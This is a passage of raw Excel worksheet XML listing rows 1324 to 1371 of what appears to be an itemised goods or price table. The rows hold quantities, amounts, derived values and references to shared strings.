      </c>
      <c r="F1324" s="238" t="s">
        <v>8307</v>
      </c>
      <c r="G1324" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1324" s="10">
        <v>2</v>
      </c>
      <c r="I1324" s="14">
        <v>695.16</v>
      </c>
      <c r="J1324" s="15">
        <v>111.2256</v>
      </c>
      <c r="K1324" s="16"/>
    </row>
    <row r="1325" spans="2:11">
      <c r="B1325" s="9">
        <v>1359</v>
      </c>
      <c r="C1325" s="238" t="s">
        <v>8308</v>
      </c>
      <c r="D1325" s="238" t="s">
        <v>8309</v>
      </c>
      <c r="E1325" s="238" t="s">
        <v>8310</v>
      </c>
      <c r="F1325" s="238" t="s">
        <v>8311</v>
      </c>
      <c r="G1325" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1325" s="10">
        <v>3</v>
      </c>
      <c r="I1325" s="14">
        <v>22.74</v>
      </c>
      <c r="J1325" s="15">
        <v>3.6384</v>
      </c>
      <c r="K1325" s="16"/>
    </row>
    <row r="1326" spans="2:11">
      <c r="B1326" s="9">
        <v>1360</v>
      </c>
      <c r="C1326" s="238" t="s">
        <v>8312</v>
      </c>
      <c r="D1326" s="238" t="s">
        <v>4765</v>
      </c>
      <c r="E1326" s="238" t="s">
        <v>4766</v>
      </c>
      <c r="F1326" s="9"/>
      <c r="G1326" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1326" s="10">
        <v>22</v>
      </c>
      <c r="I1326" s="14">
        <v>1114.95</v>
      </c>
      <c r="J1326" s="15">
        <v>178.3936</v>
      </c>
      <c r="K1326" s="16"/>
    </row>
    <row r="1327" spans="2:11">
      <c r="B1327" s="9">
        <v>1361</v>
      </c>
      <c r="C1327" s="238" t="s">
        <v>8313</v>
      </c>
      <c r="D1327" s="238" t="s">
        <v>8314</v>
      </c>
      <c r="E1327" s="238" t="s">
        <v>8315</v>
      </c>
      <c r="F1327" s="238" t="s">
        <v>8316</v>
      </c>
      <c r="G1327" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1327" s="10">
        <v>7</v>
      </c>
      <c r="I1327" s="14">
        <v>411.93</v>
      </c>
      <c r="J1327" s="15">
        <v>65.912</v>
      </c>
      <c r="K1327" s="16"/>
    </row>
    <row r="1328" spans="2:11">
      <c r="B1328" s="9">
        <v>1362</v>
      </c>
      <c r="C1328" s="238" t="s">
        <v>8317</v>
      </c>
      <c r="D1328" s="238" t="s">
        <v>8318</v>
      </c>
      <c r="E1328" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1328" s="238" t="s">
        <v>8320</v>
      </c>
      <c r="G1328" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1328" s="10">
        <v>55</v>
      </c>
      <c r="I1328" s="14">
        <v>747.57</v>
      </c>
      <c r="J1328" s="15">
        <v>119.592</v>
      </c>
      <c r="K1328" s="16"/>
    </row>
    <row r="1329" spans="2:11">
      <c r="B1329" s="9">
        <v>1363</v>
      </c>
      <c r="C1329" s="238" t="s">
        <v>8321</v>
      </c>
      <c r="D1329" s="238" t="s">
        <v>8322</v>
      </c>
      <c r="E1329" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1329" s="238" t="s">
        <v>8323</v>
      </c>
      <c r="G1329" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1329" s="10">
        <v>30</v>
      </c>
      <c r="I1329" s="14">
        <v>12.82</v>
      </c>
      <c r="J1329" s="15">
        <v>2.064</v>
      </c>
      <c r="K1329" s="16"/>
    </row>
    <row r="1330" spans="2:11">
      <c r="B1330" s="9">
        <v>1364</v>
      </c>
      <c r="C1330" s="238" t="s">
        <v>8324</v>
      </c>
      <c r="D1330" s="238" t="s">
        <v>8325</v>
      </c>
      <c r="E1330" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1330" s="238" t="s">
        <v>8326</v>
      </c>
      <c r="G1330" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1330" s="10">
        <v>50</v>
      </c>
      <c r="I1330" s="14">
        <v>223.3</v>
      </c>
      <c r="J1330" s="15">
        <v>35.76</v>
      </c>
      <c r="K1330" s="16"/>
    </row>
    <row r="1331" spans="2:11">
      <c r="B1331" s="9">
        <v>1365</v>
      </c>
      <c r="C1331" s="238" t="s">
        <v>8327</v>
      </c>
      <c r="D1331" s="238" t="s">
        <v>8328</v>
      </c>
      <c r="E1331" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1331" s="238" t="s">
        <v>8329</v>
      </c>
      <c r="G1331" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1331" s="10">
        <v>160</v>
      </c>
      <c r="I1331" s="14">
        <v>645.63</v>
      </c>
      <c r="J1331" s="15">
        <v>103.424</v>
      </c>
      <c r="K1331" s="16"/>
    </row>
    <row r="1332" spans="2:11">
      <c r="B1332" s="9">
        <v>1366</v>
      </c>
      <c r="C1332" s="238" t="s">
        <v>8330</v>
      </c>
      <c r="D1332" s="238" t="s">
        <v>8331</v>
      </c>
      <c r="E1332" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1332" s="238" t="s">
        <v>8332</v>
      </c>
      <c r="G1332" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1332" s="10">
        <v>180</v>
      </c>
      <c r="I1332" s="14">
        <v>318.65</v>
      </c>
      <c r="J1332" s="15">
        <v>50.976</v>
      </c>
      <c r="K1332" s="16"/>
    </row>
    <row r="1333" spans="2:11">
      <c r="B1333" s="9">
        <v>1367</v>
      </c>
      <c r="C1333" s="238" t="s">
        <v>8333</v>
      </c>
      <c r="D1333" s="238" t="s">
        <v>8334</v>
      </c>
      <c r="E1333" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1333" s="238" t="s">
        <v>8335</v>
      </c>
      <c r="G1333" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1333" s="10">
        <v>105</v>
      </c>
      <c r="I1333" s="14">
        <v>354.86</v>
      </c>
      <c r="J1333" s="15">
        <v>56.784</v>
      </c>
      <c r="K1333" s="16"/>
    </row>
    <row r="1334" spans="2:11">
      <c r="B1334" s="9">
        <v>1368</v>
      </c>
      <c r="C1334" s="238" t="s">
        <v>8336</v>
      </c>
      <c r="D1334" s="238" t="s">
        <v>8337</v>
      </c>
      <c r="E1334" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1334" s="238" t="s">
        <v>8338</v>
      </c>
      <c r="G1334" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1334" s="10">
        <v>35</v>
      </c>
      <c r="I1334" s="14">
        <v>57.98</v>
      </c>
      <c r="J1334" s="15">
        <v>9.296</v>
      </c>
      <c r="K1334" s="16"/>
    </row>
    <row r="1335" spans="2:11">
      <c r="B1335" s="9">
        <v>1369</v>
      </c>
      <c r="C1335" s="238" t="s">
        <v>8339</v>
      </c>
      <c r="D1335" s="238" t="s">
        <v>4921</v>
      </c>
      <c r="E1335" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1335" s="238" t="s">
        <v>8340</v>
      </c>
      <c r="G1335" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1335" s="10">
        <v>50</v>
      </c>
      <c r="I1335" s="14">
        <v>126.21</v>
      </c>
      <c r="J1335" s="15">
        <v>20.16</v>
      </c>
      <c r="K1335" s="16"/>
    </row>
    <row r="1336" spans="2:11">
      <c r="B1336" s="9">
        <v>1370</v>
      </c>
      <c r="C1336" s="238" t="s">
        <v>8341</v>
      </c>
      <c r="D1336" s="238" t="s">
        <v>8342</v>
      </c>
      <c r="E1336" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1336" s="238" t="s">
        <v>8343</v>
      </c>
      <c r="G1336" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1336" s="10">
        <v>150</v>
      </c>
      <c r="I1336" s="14">
        <v>306.73</v>
      </c>
      <c r="J1336" s="15">
        <v>48.96</v>
      </c>
      <c r="K1336" s="16"/>
    </row>
    <row r="1337" spans="2:11">
      <c r="B1337" s="9">
        <v>1371</v>
      </c>
      <c r="C1337" s="238" t="s">
        <v>8344</v>
      </c>
      <c r="D1337" s="238" t="s">
        <v>8345</v>
      </c>
      <c r="E1337" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1337" s="238" t="s">
        <v>8346</v>
      </c>
      <c r="G1337" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1337" s="10">
        <v>50</v>
      </c>
      <c r="I1337" s="14">
        <v>150.49</v>
      </c>
      <c r="J1337" s="15">
        <v>24.08</v>
      </c>
      <c r="K1337" s="16"/>
    </row>
    <row r="1338" spans="2:11">
      <c r="B1338" s="9">
        <v>1372</v>
      </c>
      <c r="C1338" s="238" t="s">
        <v>8347</v>
      </c>
      <c r="D1338" s="238" t="s">
        <v>8348</v>
      </c>
      <c r="E1338" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1338" s="238" t="s">
        <v>8349</v>
      </c>
      <c r="G1338" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1338" s="10">
        <v>6</v>
      </c>
      <c r="I1338" s="14">
        <v>401.71</v>
      </c>
      <c r="J1338" s="15">
        <v>64.272</v>
      </c>
      <c r="K1338" s="16"/>
    </row>
    <row r="1339" spans="2:11">
      <c r="B1339" s="9">
        <v>1373</v>
      </c>
      <c r="C1339" s="238" t="s">
        <v>8350</v>
      </c>
      <c r="D1339" s="238" t="s">
        <v>8351</v>
      </c>
      <c r="E1339" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1339" s="238" t="s">
        <v>8352</v>
      </c>
      <c r="G1339" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1339" s="10">
        <v>35</v>
      </c>
      <c r="I1339" s="14">
        <v>132.52</v>
      </c>
      <c r="J1339" s="15">
        <v>21.224</v>
      </c>
      <c r="K1339" s="16"/>
    </row>
    <row r="1340" spans="2:11">
      <c r="B1340" s="9">
        <v>1374</v>
      </c>
      <c r="C1340" s="238" t="s">
        <v>8353</v>
      </c>
      <c r="D1340" s="238" t="s">
        <v>8354</v>
      </c>
      <c r="E1340" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1340" s="238" t="s">
        <v>8355</v>
      </c>
      <c r="G1340" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1340" s="10">
        <v>70</v>
      </c>
      <c r="I1340" s="14">
        <v>299.03</v>
      </c>
      <c r="J1340" s="15">
        <v>47.824</v>
      </c>
      <c r="K1340" s="16"/>
    </row>
    <row r="1341" spans="2:11">
      <c r="B1341" s="9">
        <v>1375</v>
      </c>
      <c r="C1341" s="238" t="s">
        <v>8356</v>
      </c>
      <c r="D1341" s="238" t="s">
        <v>8357</v>
      </c>
      <c r="E1341" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1341" s="238" t="s">
        <v>8358</v>
      </c>
      <c r="G1341" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1341" s="10">
        <v>28</v>
      </c>
      <c r="I1341" s="14">
        <v>195.73</v>
      </c>
      <c r="J1341" s="15">
        <v>31.3152</v>
      </c>
      <c r="K1341" s="16"/>
    </row>
    <row r="1342" spans="2:11">
      <c r="B1342" s="9">
        <v>1376</v>
      </c>
      <c r="C1342" s="238" t="s">
        <v>8359</v>
      </c>
      <c r="D1342" s="238" t="s">
        <v>8360</v>
      </c>
      <c r="E1342" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F1342" s="238" t="s">
        <v>8361</v>
      </c>
      <c r="G1342" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1342" s="10">
        <v>50</v>
      </c>
      <c r="I1342" s="14">
        <v>165.05</v>
      </c>
      <c r="J1342" s="15">
        <v>26.4</v>
      </c>
      <c r="K1342" s="16"/>
    </row>
    <row r="1343" spans="2:11">
      <c r="B1343" s="9">
        <v>1377</v>
      </c>
      <c r="C1343" s="238" t="s">
        <v>8362</v>
      </c>
      <c r="D1343" s="238" t="s">
        <v>8363</v>
      </c>
      <c r="E1343" s="238" t="s">
        <v>8364</v>
      </c>
      <c r="F1343" s="238" t="s">
        <v>8365</v>
      </c>
      <c r="G1343" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1343" s="10">
        <v>1</v>
      </c>
      <c r="I1343" s="14">
        <v>1367.52</v>
      </c>
      <c r="J1343" s="15">
        <v>218.8032</v>
      </c>
      <c r="K1343" s="16"/>
    </row>
    <row r="1344" spans="2:11">
      <c r="B1344" s="9">
        <v>1378</v>
      </c>
      <c r="C1344" s="238" t="s">
        <v>8366</v>
      </c>
      <c r="D1344" s="238" t="s">
        <v>8367</v>
      </c>
      <c r="E1344" s="238" t="s">
        <v>8368</v>
      </c>
      <c r="F1344" s="238" t="s">
        <v>8369</v>
      </c>
      <c r="G1344" s="237" t="s">
        <v>5339</v>
      </c>
      <c r="H1344" s="10">
        <v>85</v>
      </c>
      <c r="I1344" s="14">
        <v>31087.23</v>
      </c>
      <c r="J1344" s="15">
        <v>4973.928</v>
      </c>
      <c r="K1344" s="16"/>
    </row>
    <row r="1345" spans="2:11">
      <c r="B1345" s="9">
        <v>1379</v>
      </c>
      <c r="C1345" s="238" t="s">
        <v>8370</v>
      </c>
      <c r="D1345" s="238" t="s">
        <v>8371</v>
      </c>
      <c r="E1345" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F1345" s="238" t="s">
        <v>8372</v>
      </c>
      <c r="G1345" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1345" s="10">
        <v>1400</v>
      </c>
      <c r="I1345" s="14">
        <v>2155.72</v>
      </c>
      <c r="J1345" s="15">
        <v>344.96</v>
      </c>
      <c r="K1345" s="16"/>
    </row>
    <row r="1346" spans="2:11">
      <c r="B1346" s="9">
        <v>1380</v>
      </c>
      <c r="C1346" s="238" t="s">
        <v>8373</v>
      </c>
      <c r="D1346" s="238" t="s">
        <v>8374</v>
      </c>
      <c r="E1346" s="238" t="s">
        <v>8375</v>
      </c>
      <c r="F1346" s="9"/>
      <c r="G1346" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1346" s="10">
        <v>1400</v>
      </c>
      <c r="I1346" s="14">
        <v>1197.09</v>
      </c>
      <c r="J1346" s="15">
        <v>192.64</v>
      </c>
      <c r="K1346" s="16"/>
    </row>
    <row r="1347" spans="2:11">
      <c r="B1347" s="9">
        <v>1381</v>
      </c>
      <c r="C1347" s="238" t="s">
        <v>8376</v>
      </c>
      <c r="D1347" s="238" t="s">
        <v>8377</v>
      </c>
      <c r="E1347" s="238" t="s">
        <v>4831</v>
      </c>
      <c r="F1347" s="238" t="s">
        <v>8378</v>
      </c>
      <c r="G1347" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1347" s="10">
        <v>1</v>
      </c>
      <c r="I1347" s="14">
        <v>1581.2</v>
      </c>
      <c r="J1347" s="15">
        <v>252.992</v>
      </c>
      <c r="K1347" s="16"/>
    </row>
    <row r="1348" spans="2:11">
      <c r="B1348" s="9">
        <v>1382</v>
      </c>
      <c r="C1348" s="238" t="s">
        <v>8379</v>
      </c>
      <c r="D1348" s="238" t="s">
        <v>7619</v>
      </c>
      <c r="E1348" s="238" t="s">
        <v>8380</v>
      </c>
      <c r="F1348" s="9"/>
      <c r="G1348" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1348" s="10">
        <v>3</v>
      </c>
      <c r="I1348" s="14">
        <v>3461.53</v>
      </c>
      <c r="J1348" s="15">
        <v>553.8432</v>
      </c>
      <c r="K1348" s="16"/>
    </row>
    <row r="1349" spans="2:11">
      <c r="B1349" s="9">
        <v>1383</v>
      </c>
      <c r="C1349" s="238" t="s">
        <v>8381</v>
      </c>
      <c r="D1349" s="238" t="s">
        <v>8382</v>
      </c>
      <c r="E1349" s="238" t="s">
        <v>8383</v>
      </c>
      <c r="F1349" s="238" t="s">
        <v>8384</v>
      </c>
      <c r="G1349" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1349" s="10">
        <v>37</v>
      </c>
      <c r="I1349" s="14">
        <v>1844.65</v>
      </c>
      <c r="J1349" s="15">
        <v>737.928</v>
      </c>
      <c r="K1349" s="16"/>
    </row>
    <row r="1350" spans="2:11">
      <c r="B1350" s="9">
        <v>1384</v>
      </c>
      <c r="C1350" s="238" t="s">
        <v>8385</v>
      </c>
      <c r="D1350" s="238" t="s">
        <v>8386</v>
      </c>
      <c r="E1350" s="238" t="s">
        <v>8387</v>
      </c>
      <c r="F1350" s="238" t="s">
        <v>8388</v>
      </c>
      <c r="G1350" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1350" s="10">
        <v>1</v>
      </c>
      <c r="I1350" s="14">
        <v>683.76</v>
      </c>
      <c r="J1350" s="15">
        <v>109.4016</v>
      </c>
      <c r="K1350" s="16"/>
    </row>
    <row r="1351" spans="2:11">
      <c r="B1351" s="9">
        <v>1385</v>
      </c>
      <c r="C1351" s="238" t="s">
        <v>8389</v>
      </c>
      <c r="D1351" s="238" t="s">
        <v>8390</v>
      </c>
      <c r="E1351" s="238" t="s">
        <v>993</v>
      </c>
      <c r="F1351" s="238" t="s">
        <v>8388</v>
      </c>
      <c r="G1351" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1351" s="10">
        <v>1</v>
      </c>
      <c r="I1351" s="14">
        <v>769.23</v>
      </c>
      <c r="J1351" s="15">
        <v>123.0768</v>
      </c>
      <c r="K1351" s="16"/>
    </row>
    <row r="1352" spans="2:11">
      <c r="B1352" s="9">
        <v>1386</v>
      </c>
      <c r="C1352" s="238" t="s">
        <v>8391</v>
      </c>
      <c r="D1352" s="238" t="s">
        <v>4757</v>
      </c>
      <c r="E1352" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F1352" s="9"/>
      <c r="G1352" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1352" s="10">
        <v>4</v>
      </c>
      <c r="I1352" s="14">
        <v>2735.04</v>
      </c>
      <c r="J1352" s="15">
        <v>437.6064</v>
      </c>
      <c r="K1352" s="16"/>
    </row>
    <row r="1353" spans="2:11">
      <c r="B1353" s="9">
        <v>1387</v>
      </c>
      <c r="C1353" s="238" t="s">
        <v>8392</v>
      </c>
      <c r="D1353" s="238" t="s">
        <v>8393</v>
      </c>
      <c r="E1353" s="238" t="s">
        <v>3854</v>
      </c>
      <c r="F1353" s="238" t="s">
        <v>8394</v>
      </c>
      <c r="G1353" s="237" t="s">
        <v>3256</v>
      </c>
      <c r="H1353" s="10">
        <v>1</v>
      </c>
      <c r="I1353" s="14">
        <v>16068.37</v>
      </c>
      <c r="J1353" s="15">
        <v>2570.9392</v>
      </c>
      <c r="K1353" s="16"/>
    </row>
    <row r="1354" spans="2:11">
      <c r="B1354" s="9">
        <v>1388</v>
      </c>
      <c r="C1354" s="238" t="s">
        <v>8395</v>
      </c>
      <c r="D1354" s="238" t="s">
        <v>8396</v>
      </c>
      <c r="E1354" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1354" s="238" t="s">
        <v>8397</v>
      </c>
      <c r="G1354" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1354" s="10">
        <v>5</v>
      </c>
      <c r="I1354" s="14">
        <v>9401.72</v>
      </c>
      <c r="J1354" s="15">
        <v>1504.272</v>
      </c>
      <c r="K1354" s="16"/>
    </row>
    <row r="1355" spans="2:11">
      <c r="B1355" s="9">
        <v>1389</v>
      </c>
      <c r="C1355" s="238" t="s">
        <v>8398</v>
      </c>
      <c r="D1355" s="238" t="s">
        <v>8399</v>
      </c>
      <c r="E1355" s="238" t="s">
        <v>5017</v>
      </c>
      <c r="F1355" s="238" t="s">
        <v>8397</v>
      </c>
      <c r="G1355" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1355" s="10">
        <v>2</v>
      </c>
      <c r="I1355" s="14">
        <v>2514.53</v>
      </c>
      <c r="J1355" s="15">
        <v>402.3264</v>
      </c>
      <c r="K1355" s="16"/>
    </row>
    <row r="1356" spans="2:11">
      <c r="B1356" s="9">
        <v>1390</v>
      </c>
      <c r="C1356" s="238" t="s">
        <v>8400</v>
      </c>
      <c r="D1356" s="238" t="s">
        <v>8401</v>
      </c>
      <c r="E1356" s="238" t="s">
        <v>5013</v>
      </c>
      <c r="F1356" s="238" t="s">
        <v>8397</v>
      </c>
      <c r="G1356" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1356" s="10">
        <v>2</v>
      </c>
      <c r="I1356" s="14">
        <v>1861.54</v>
      </c>
      <c r="J1356" s="15">
        <v>297.8464</v>
      </c>
      <c r="K1356" s="16"/>
    </row>
    <row r="1357" spans="2:11">
      <c r="B1357" s="9">
        <v>1391</v>
      </c>
      <c r="C1357" s="238" t="s">
        <v>8402</v>
      </c>
      <c r="D1357" s="238" t="s">
        <v>8403</v>
      </c>
      <c r="E1357" s="238" t="s">
        <v>5197</v>
      </c>
      <c r="F1357" s="238" t="s">
        <v>8397</v>
      </c>
      <c r="G1357" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1357" s="10">
        <v>2</v>
      </c>
      <c r="I1357" s="14">
        <v>572.65</v>
      </c>
      <c r="J1357" s="15">
        <v>91.6256</v>
      </c>
      <c r="K1357" s="16"/>
    </row>
    <row r="1358" spans="2:11">
      <c r="B1358" s="9">
        <v>1392</v>
      </c>
      <c r="C1358" s="238" t="s">
        <v>8404</v>
      </c>
      <c r="D1358" s="238" t="s">
        <v>8405</v>
      </c>
      <c r="E1358" s="238" t="s">
        <v>4747</v>
      </c>
      <c r="F1358" s="238" t="s">
        <v>8397</v>
      </c>
      <c r="G1358" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1358" s="10">
        <v>2</v>
      </c>
      <c r="I1358" s="14">
        <v>666.67</v>
      </c>
      <c r="J1358" s="15">
        <v>106.6688</v>
      </c>
      <c r="K1358" s="16"/>
    </row>
    <row r="1359" spans="2:11">
      <c r="B1359" s="9">
        <v>1393</v>
      </c>
      <c r="C1359" s="238" t="s">
        <v>8406</v>
      </c>
      <c r="D1359" s="238" t="s">
        <v>8407</v>
      </c>
      <c r="E1359" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1359" s="238" t="s">
        <v>8397</v>
      </c>
      <c r="G1359" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1359" s="10">
        <v>2</v>
      </c>
      <c r="I1359" s="14">
        <v>6104.27</v>
      </c>
      <c r="J1359" s="15">
        <v>976.6848</v>
      </c>
      <c r="K1359" s="16"/>
    </row>
    <row r="1360" spans="2:11">
      <c r="B1360" s="9">
        <v>1394</v>
      </c>
      <c r="C1360" s="238" t="s">
        <v>8408</v>
      </c>
      <c r="D1360" s="238" t="s">
        <v>8409</v>
      </c>
      <c r="E1360" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1360" s="238" t="s">
        <v>8410</v>
      </c>
      <c r="G1360" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1360" s="10">
        <v>2</v>
      </c>
      <c r="I1360" s="14">
        <v>3162.39</v>
      </c>
      <c r="J1360" s="15">
        <v>505.984</v>
      </c>
      <c r="K1360" s="16"/>
    </row>
    <row r="1361" spans="2:11">
      <c r="B1361" s="9">
        <v>1395</v>
      </c>
      <c r="C1361" s="238" t="s">
        <v>8411</v>
      </c>
      <c r="D1361" s="238" t="s">
        <v>8412</v>
      </c>
      <c r="E1361" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1361" s="238" t="s">
        <v>8413</v>
      </c>
      <c r="G1361" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1361" s="10">
        <v>2</v>
      </c>
      <c r="I1361" s="14">
        <v>1675.21</v>
      </c>
      <c r="J1361" s="15">
        <v>268.0352</v>
      </c>
      <c r="K1361" s="16"/>
    </row>
    <row r="1362" spans="2:11">
      <c r="B1362" s="9">
        <v>1396</v>
      </c>
      <c r="C1362" s="238" t="s">
        <v>8414</v>
      </c>
      <c r="D1362" s="238" t="s">
        <v>8415</v>
      </c>
      <c r="E1362" s="238" t="s">
        <v>8416</v>
      </c>
      <c r="F1362" s="238" t="s">
        <v>8417</v>
      </c>
      <c r="G1362" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1362" s="10">
        <v>1</v>
      </c>
      <c r="I1362" s="14">
        <v>478.64</v>
      </c>
      <c r="J1362" s="15">
        <v>76.5824</v>
      </c>
      <c r="K1362" s="16"/>
    </row>
    <row r="1363" spans="2:11">
      <c r="B1363" s="9">
        <v>1397</v>
      </c>
      <c r="C1363" s="238" t="s">
        <v>8418</v>
      </c>
      <c r="D1363" s="238" t="s">
        <v>8419</v>
      </c>
      <c r="E1363" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1363" s="238" t="s">
        <v>8420</v>
      </c>
      <c r="G1363" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1363" s="10">
        <v>2</v>
      </c>
      <c r="I1363" s="14">
        <v>658.11</v>
      </c>
      <c r="J1363" s="15">
        <v>105.2992</v>
      </c>
      <c r="K1363" s="16"/>
    </row>
    <row r="1364" spans="2:11">
      <c r="B1364" s="9">
        <v>1398</v>
      </c>
      <c r="C1364" s="238" t="s">
        <v>8421</v>
      </c>
      <c r="D1364" s="238" t="s">
        <v>8422</v>
      </c>
      <c r="E1364" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1364" s="238" t="s">
        <v>540</v>
      </c>
      <c r="G1364" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1364" s="10">
        <v>4</v>
      </c>
      <c r="I1364" s="14">
        <v>2418.81</v>
      </c>
      <c r="J1364" s="15">
        <v>387.008</v>
      </c>
      <c r="K1364" s="16"/>
    </row>
    <row r="1365" spans="2:11">
      <c r="B1365" s="9">
        <v>1399</v>
      </c>
      <c r="C1365" s="238" t="s">
        <v>8423</v>
      </c>
      <c r="D1365" s="238" t="s">
        <v>8424</v>
      </c>
      <c r="E1365" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1365" s="238" t="s">
        <v>540</v>
      </c>
      <c r="G1365" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1365" s="10">
        <v>1</v>
      </c>
      <c r="I1365" s="14">
        <v>256.41</v>
      </c>
      <c r="J1365" s="15">
        <v>41.0256</v>
      </c>
      <c r="K1365" s="16"/>
    </row>
    <row r="1366" spans="2:11">
      <c r="B1366" s="9">
        <v>1400</v>
      </c>
      <c r="C1366" s="238" t="s">
        <v>8425</v>
      </c>
      <c r="D1366" s="238" t="s">
        <v>8409</v>
      </c>
      <c r="E1366" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1366" s="9"/>
      <c r="G1366" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1366" s="10">
        <v>3</v>
      </c>
      <c r="I1366" s="14">
        <v>1361.82</v>
      </c>
      <c r="J1366" s="15">
        <v>217.8912</v>
      </c>
      <c r="K1366" s="16"/>
    </row>
    <row r="1367" spans="2:11">
      <c r="B1367" s="9">
        <v>1401</v>
      </c>
      <c r="C1367" s="238" t="s">
        <v>8426</v>
      </c>
      <c r="D1367" s="238" t="s">
        <v>8427</v>
      </c>
      <c r="E1367" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F1367" s="238" t="s">
        <v>370</v>
      </c>
      <c r="G1367" s="237" t="s">
        <v>3484</v>
      </c>
      <c r="H1367" s="10">
        <v>1</v>
      </c>
      <c r="I1367" s="14">
        <v>512.82</v>
      </c>
      <c r="J1367" s="15">
        <v>82.0512</v>
      </c>
      <c r="K1367" s="16"/>
    </row>
    <row r="1368" spans="2:11">
      <c r="B1368" s="9">
        <v>1402</v>
      </c>
      <c r="C1368" s="238" t="s">
        <v>8428</v>
      </c>
      <c r="D1368" s="238" t="s">
        <v>8429</v>
      </c>
      <c r="E1368" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F1368" s="9"/>
      <c r="G1368" s="237" t="s">
        <v>461</v>
      </c>
      <c r="H1368" s="10">
        <v>50</v>
      </c>
      <c r="I1368" s="14">
        <v>341.88</v>
      </c>
      <c r="J1368" s="15">
        <v>136.8</v>
      </c>
      <c r="K1368" s="16"/>
    </row>
    <row r="1369" spans="2:11">
      <c r="B1369" s="9">
        <v>1403</v>
      </c>
      <c r="C1369" s="238" t="s">
        <v>8430</v>
      </c>
      <c r="D1369" s="238" t="s">
        <v>8431</v>
      </c>
      <c r="E1369" s="238" t="s">
        <v>5028</v>
      </c>
      <c r="F1369" s="238" t="s">
        <v>8432</v>
      </c>
      <c r="G1369" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1369" s="10">
        <v>3</v>
      </c>
      <c r="I1369" s="14">
        <v>1433.62</v>
      </c>
      <c r="J1369" s="15">
        <v>229.3776</v>
      </c>
      <c r="K1369" s="16"/>
    </row>
    <row r="1370" spans="2:11">
      <c r="B1370" s="9">
        <v>1404</v>
      </c>
      <c r="C1370" s="238" t="s">
        <v>8433</v>
      </c>
      <c r="D1370" s="238" t="s">
        <v>8434</v>
      </c>
      <c r="E1370" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F1370" s="238" t="s">
        <v>8435</v>
      </c>
      <c r="G1370" s="237" t="s">
        <v>466</v>
      </c>
      <c r="H1370" s="10">
        <v>1</v>
      </c>
      <c r="I1370" s="14">
        <v>410.26</v>
      </c>
      <c r="J1370" s="15">
        <v>65.6416</v>
      </c>
      <c r="K1370" s="16"/>
    </row>
    <row r="1371" spans="2:11">
      <c r="B1371" s="9">
        <v>1405</v>
      </c>
      <c r="C1371" s="238" t="s">
        <v>8436</v>
      </c>
      <c r="D1371" s="238" t="s">
        <v>4728</v>
      </c>
      <c r="E1371" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F1371" s="238" t="s">
        <v>3968</v>
      </c>
      <c r="G1371" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H1371" s="10">
        <v>2</v>
      </c>
